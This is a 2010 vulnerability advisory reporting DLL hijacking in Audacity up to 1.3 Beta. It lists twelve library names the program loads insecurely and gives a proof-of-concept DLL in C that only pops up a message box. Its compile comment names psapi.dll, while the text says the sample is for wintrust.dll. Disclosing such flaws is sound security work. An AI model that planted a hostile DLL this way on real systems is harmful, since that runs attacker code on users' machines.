Audacity <= 1.3 DLL Hijacking Vulnerability

 Name              Audacity
 Vendor            http://audacity.sourceforge.net
 Versions Affected <= 1.3 Beta

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-10-29

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION
________________________

Audacity is free, open source software  for recording and
editing sounds.


II. DESCRIPTION
_______________

The  vulnerability  is  caused  due  to  the  application
loading libraries in an insecure manner.

I tested the versions  1.2.6  (stable) and the  1.3 Beta.

Other versions could be vulnerable.


III. ANALYSIS
_____________

Summary:

 A) DLL Hijacking


A) DLL Hijacking
________________

The Audacity's  installation folder  by  defaul t doesn't 
contains DLLs files. When it  tries to  load  some  DLLs,
first  of  all, looks at the installation  directory  and
after in system32 directory.
Due of this is  possible  to hijack the load operation in
order to load a malicious DLL file with the same name.
The following is the list of affected DLLs:

wintrust.dll
msasn1.dll
msacm32.dll
midimap.dll
wsock32.dll
ws2_32.dll
ws2help.dll
winmm.dll
lpk.dll
usp10.dll
setupapi.dll
crypt32.dll


IV. SAMPLE CODE
_______________

A) DLL Hijacking


The  following   is   the   sample   code   (evil.c)  for
wintrust.dll:

// compile: gcc -shared -o psapi.dll evil.c

#include <windows.h>
 
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
 
    MessageBox(0, "DLL Hijacking!", "Salvatore Fresta", MB_OK);
 
    return TRUE;
}


V. FIX
______

No fix.